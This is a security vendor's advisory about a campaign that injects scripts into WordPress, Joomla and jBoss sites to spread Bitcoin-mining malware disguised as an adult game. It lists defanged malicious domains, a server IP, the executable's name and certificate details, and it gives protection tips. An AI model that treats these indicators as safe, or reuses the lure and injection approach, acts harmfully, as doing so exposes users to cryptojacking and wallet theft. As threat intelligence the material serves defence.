Security Alert: Attackers Using Script Injection to Spread Bitcoin-Mining Malware

Share and earn Cybytes
Facebook Twitter LinkedIn Email

Security researchers recently analyzed various spam campaigns and discovered a new one related to Bitcoin cryptocurrency that is impacting a lot of websites.

For the past months, Bitcoin gained a lot of attention and reached high price levels, followed by various fluctuations. The process of mining consists in verifying other Bitcoin transactions, which users are rewarded for, and is supposed to keep transactions safe and secure.

How the infection is spread

During this spam campaign, online criminals try to inject a malicious script into different WordPress, Joomla, and jBoss legitimate websites. They do this by hiding the unwanted script on the embed site with the main purpose to create a binary file. With the help of this binary file, hackers will misuse the PC’s CPU to access users’ computers to mine Bitcoin.

Basically, when visitors access a website that hosts the malicious script, their PC’s CPU is used to mine Bitcoin currency for cyber attackers. It will also collect information from the Bitcoin wallet which has been installed on the compromised machine.

Here is how the malicious script is injected with a reference to the following site (sanitized for your own protection)

http: // online-game-18 [.] xyz /? c = 41-149-20180219062557833d27348 & pst = 2 & key = [uniktID]

The package file provided to the potential victims looks like a game for adults named “The # 1 Adult Game – Free to Play” and containing an executable filename “setup_sex_game.exe”

The binary package is digitally certified by Comodo with the following details:

Status Valid
Issuer COMODO RSA Code Signing CA
Valid from 1:00 AM 2/15/2018 to 12:59 AM 2/16/2019
Valid Use Code Signing
Algorithm sha256RSA
Thumbprint 9FB7FD71BB7DA9C256E872CB56E3808E811990BB
Serial number 66 CA 14 17 72 9E 0A BB D8 F9 80 08 A3 97 4B B4

The above domain is hosted on this server (sanitized for your own protection) 212.224.118 [.] 40. Security researchers discovered that it’s the same server linked with other Bitcoin mining domains, including the same offer of a free game. Here’s a list of malicious domains:

action8 [.] xyz
biggame1 [.] xyz
updflash [.] xyz
Best-game [.] xyz
game18plus [.] xyz
need action [.] xyz
Win32 flash [.] xyz
update-flash [.] xyz
Update Flash Player [.] xyz

Heimdal Security proactively blocked all infected sites, so all Heimdal PRO and Heimdal CORP users are protected.

According to VirusTotal, only 16 antivirus engines out of 68 managed to detect the binary package file at the time we write this article.

VirusTotal Bitcoin miner

How to protect yourself against malicious script injections

The main issue with the Bitcoin Mining malware is that it acts like a fileless malware and usually go undetected by traditional antivirus products. Injecting a malicious script, hackers can redirect users to a compromised site and steal users’ sensitive data. This is why we strongly recommend users to:

  • Apply all the updates available for your apps (especially the most vulnerable ones: Flash and Java, browsers), software programs and system. Do NOT postpone and neglect to keep your system fully patched. Keeping OS up to date is the best thing users can do for their safety.
  • Be very careful when clicking on suspicious links or websites and always check if the web page’s URL is genuine;
  • Make sure you access sites that use a security certificate or HTTPS to avoid malware infection;
  • Install a reliable antivirus program installed on your computer to protect your valuable data from online threats;
  • Consider adding multiple layers of protection and use also a proactive cyber security software solution;
  • Probably one of the best security measure everyone can use is to learn how to easily detect various online threats. We recommend reading these free educational resources to gain more knowledge in the cybersecurity industry.

Heimdal Official logo

If you liked this post, you will enjoy our newsletter.
Receive new articles directly in your inbox

*This article features cyber intelligence provided by CSIS Security Group researchers.

Share this post and earn Cybytes
Facebook Twitter LinkedIn Email
About Heimdal Security
We protect users and companies from cyber-criminal actions, by keeping confidential information and intellectual property safe. We build products focused on proactive cyber security and we dedicate a big part of our efforts to cyber security education for everyone.
Promoted Content
Expert Roundup: Is Internet Security a Losing Battle?
A while ago, one of our readers asked us to answer the following questions: Is Internet security a losing battle? How come companies are always 1-2 steps behind the fight? How can the bad guys respond so fast?That reader is certainly not the only one with this issue on his mind. Many Internet users feel discouraged by the current state of cyber crime and its consequences, and the rest don’t yet understand why they should care about it. We wanted to do something to change this.Naturally, users like you and me are not the only ones who wrestle this dilemma. Within the industry, cyber security experts are deeply involved in studying the causes and changes which have brought us to this point so they can create better solutions. Each of these experts brings a different perspective to the discussion, because no single person can ever claim to have the full picture.That is why we reached out to some of the most experienced cyber security specialists in the field to gather their thoughts on the topic. We believe that the questions we received are justified and they deserve an honest answer. And you will find plenty of them in the article!

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?